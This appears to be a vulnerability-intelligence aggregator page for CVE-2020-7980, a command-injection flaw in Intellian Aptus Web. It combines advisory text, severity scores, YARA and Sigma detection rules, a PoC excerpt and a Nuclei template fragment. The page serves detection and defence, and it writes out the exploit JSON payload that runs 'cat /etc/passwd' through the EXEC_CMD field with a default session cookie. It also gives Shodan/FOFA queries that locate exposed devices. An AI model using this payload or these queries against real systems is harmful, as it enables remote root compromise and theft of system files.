CVE-2020-7980
published 2020-01-25CVE-2020-7980: Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a…
PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
82.96%
99.6th percentile
Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| intelliantech | aptus_web | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command{"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1}↗
yara↗
rule CVE_2020_7980_Intellian_RCE { strings: $uri = "/cgi-bin/libagent.cgi" $field = "EXEC_CMD" $cookie = "sid=123456789" condition: $uri and $field and $cookie }sigma↗
title: CVE-2020-7980 Intellian Aptus Web RCE
detection:
selection:
cs-method: POST
cs-uri-stem|contains: '/cgi-bin/libagent.cgi'
cs-uri-query|contains: 'type=J'
cs-cookie|contains: 'sid=123456789'
condition: selection- →Exploit targets POST requests to /cgi-bin/libagent.cgi?type=J with a JSON body containing the key 'F_': 'EXEC_CMD' and a command in the 'Q' sub-field of 'P1_'. Monitor HTTP POST traffic to this URI for the EXEC_CMD function identifier. ↗
- →The exploit uses a hardcoded session cookie value 'sid=123456789' (the default Intellian account credential). Presence of this specific sid value in requests to /cgi-bin/libagent.cgi is a strong indicator of exploitation or reconnaissance. ↗
- →The PoC appends a Unix epoch timestamp (in milliseconds) as a query parameter after 'type=J' to the CGI URI. Look for POST requests matching the pattern /cgi-bin/libagent.cgi?type=J&<13-digit-epoch>. ↗
- →Shodan/FOFA exposure queries can identify internet-facing vulnerable devices. Hosts with HTTP title 'Intellian Aptus Web' are candidate targets. ↗
- →Successful exploitation results in command execution as root (uid=0). Correlate web server logs for POST to /cgi-bin/libagent.cgi with subsequent anomalous process spawning from the CGI process. ↗
- →The regex 'root:[x*]:0:0' in the HTTP response body can be used as a detection matcher to confirm successful /etc/passwd exfiltration via this vulnerability. ↗
- ·The hardcoded sid value '123456789' corresponds to the default Intellian account. Attackers may also use a legitimately obtained session token, so absence of this exact value does not rule out exploitation. ↗
- ·The exploit was tested against version 1.12 and confirmed on 1.24; the PoC author notes 'v1.12+' as the affected range, so detection rules should not be version-gated. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-wfw7-q64q-6rfc: Intellian Aptus Web 1
ghsa_unreviewed·2022-05-24
CVE-2020-7980 [HIGH] CWE-78 GHSA-wfw7-q64q-6rfc: Intellian Aptus Web 1
Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.
VulnCheck
intelliantech aptus_web Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-7980 [CRITICAL] intelliantech aptus_web Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
intelliantech aptus_web Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.
Affected: intelliantech aptus_web
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&host_type=src&vulnerability=cve-2020-7980; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-20&host_type=
No detection rules found.
Exploit-DB
Satellian 1.12 - Remote Code Execution
exploitdb·2020-01-29·CVSS 9.8
CVE-2020-7980 [CRITICAL] Satellian 1.12 - Remote Code Execution
Satellian 1.12 - Remote Code Execution
---
# Exploit Title: Satellian 1.12 - Remote Code Execution
# Date: 2020-01-28
# Exploit Author: Xh4H
# Vendor Homepage: https://www.intelliantech.com/?lang=en
# Version: v1.12+
# Tested on: Kali linux, MacOS
# CVE : CVE-2020-7980
# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980
# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://
# ________________________________________
# (__) / \
# (oo) ( Intellian Satellite Terminal PoC )
# /-------\/ --' \________________________________________/
# / | ||
# * ||----||
# Performing initial scan. Listing available system binaries.
# Starting request to http://
# Executing command /bin/ls /bin
# acu_server
# acu_tool
# addgroup
# adduser
# ...
# Satellian $ id
# uid=0(root) gid=
Nuclei
Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution
nuclei·CVSS 9.8
CVE-2020-7980 [CRITICAL] Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution
Satellian Intellian Aptus Web 1.24).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-7980
- https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html
- https://github.com/Xh4H/Satellian-CVE-2020-7980
- http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html
- https://github.com/0xT11/CVE-POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-7980
cwe-id: CWE-78
epss-score: 0.93844
epss-percentile: 0.99865
cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: intelliantech
product: aptus_web
shodan-query:
- http.title:"Intellian Aptus Web"
- http.title:"intellian aptus web"
fofa-query: title="intellian aptus web"
google-query: intitle:"intell
Fortinet
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
blogs_fortinet·2022-10-21·CVSS 9.8
CVE-2022-22954 [CRITICAL] Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
FORTIGUARD LABS THREAT RESEARCH
Mirai, RAR1Ransom, and GuardMiner – Multiple Malware Campaigns Target VMware Vulnerability
By Cara Lin | October 21, 2022
In April, VMware patched a vulnerability CVE-2022-22954. It causes server-side template injection because of the lack of sanitization on parameters “deviceUdid” and “devicetype”. It allows attackers to inject a payload and achieve remote code execution on VMware Workspace ONE Access and Identity Manager. FortiGuard Labs published Threat Signal Report about it and also developed IPS signature in April.
We observed attacks in the wild since then. Most of the payloads focus on probing a victim’s sensitive data, for example, passwords, hosts file, etc. But in August, there were a few particular payloads, which got our interest. They had th
Greynoiseio
NoiseLetter June 2025
blogs_greynoiseio
NoiseLetter June 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.htmlhttps://github.com/Xh4H/Satellian-CVE-2020-7980https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.htmlhttp://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.htmlhttps://github.com/Xh4H/Satellian-CVE-2020-7980https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html
2020-01-25
Published
Exploited in the wild